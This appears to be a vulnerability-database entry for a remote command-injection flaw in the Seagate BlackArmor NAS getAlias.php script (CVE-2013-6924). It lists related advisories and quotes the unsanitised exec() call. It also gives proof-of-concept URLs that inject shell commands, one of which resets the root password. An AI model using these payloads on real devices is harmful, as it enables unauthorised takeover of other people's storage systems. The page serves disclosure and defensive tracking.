Seagate BlackArmor NAS sg2000-2000.1331 - Remote Command Execution

🗓️ 06 Jan 2014 00:00:00Reported by Jeroen-ITNerdboxType

zdt🔗 0day.today👁 33 Views

Seagate BlackArmor NAS sg2000-2000.1331 - Remote Command Execution vulnerability in getAlias.php allows unauthorized command execution

Reporter	Title	Published	Views	Family All 11
BDU FSTEC	The vulnerability in the getAlias.php script of the Seagate BlackArmor NAS network storage software allows a hacker to execute arbitrary commands.	4 Dec 201700:00	–	bdu_fstec
CVE	CVE-2013-6924	11 Oct 201712:00	–	cve
Cvelist	CVE-2013-6924	11 Oct 201712:00	–	cvelist
Exploit DB	Seagate BlackArmor NAS sg2000-2000.1331 - Remote Command Execution	6 Jan 201400:00	–	exploitdb
exploitpack	Seagate BlackArmor NAS sg2000-2000.1331 - Remote Command Execution	6 Jan 201400:00	–	exploitpack
NVD	CVE-2013-6924	11 Oct 201712:29	–	nvd
OpenVAS	Seagate BlackArmor NAS Multiple Vulnerabilities	6 Jan 201400:00	–	openvas
Packet Storm	Seagate BlackArmor NAS sg2000-2000.1331 Remote Command Execution	6 Jan 201400:00	–	packetstorm
Prion	Design/Logic Flaw	11 Oct 201712:29	–	prion
seebug.org	Seagate BlackArmor NAS sg2000-2000.1331远程代码执行漏洞	6 Jan 201400:00	–	seebug

# The file getAlias.php located in /backupmgt has the following lines:
 
#
 
# $ipAddress = $_GET["ip";
 
# if ($ipAddress != "") {
 
#    exec("grep -I $ipAddress $immedLogFile > aliasHistory.txt");
 
#    ..
 
#    ..
 
# }
 
#
 
# The GET parameter can easily be manipulated to execute commands on the
BlackArmor system.
 
#
 
## Proof of Concept:
 
#
 
# http(s)://<ip | host>/backupmgt/getAlias.php?ip=xx /etc/passwd; <your
command here>;
 
#
 
## Example to change the root password to 'mypassword':
 
#
 
# http(s)://<ip | host>/backupmgt/getAlias.php?ip=xx /etc/passwd; echo
'mypassword' | passwd --stdin;

#  0day.today [2018-04-08]  #

06 Jan 2014 00:00Current

9.2High risk

Vulners AI Score9.2

EPSS0.48357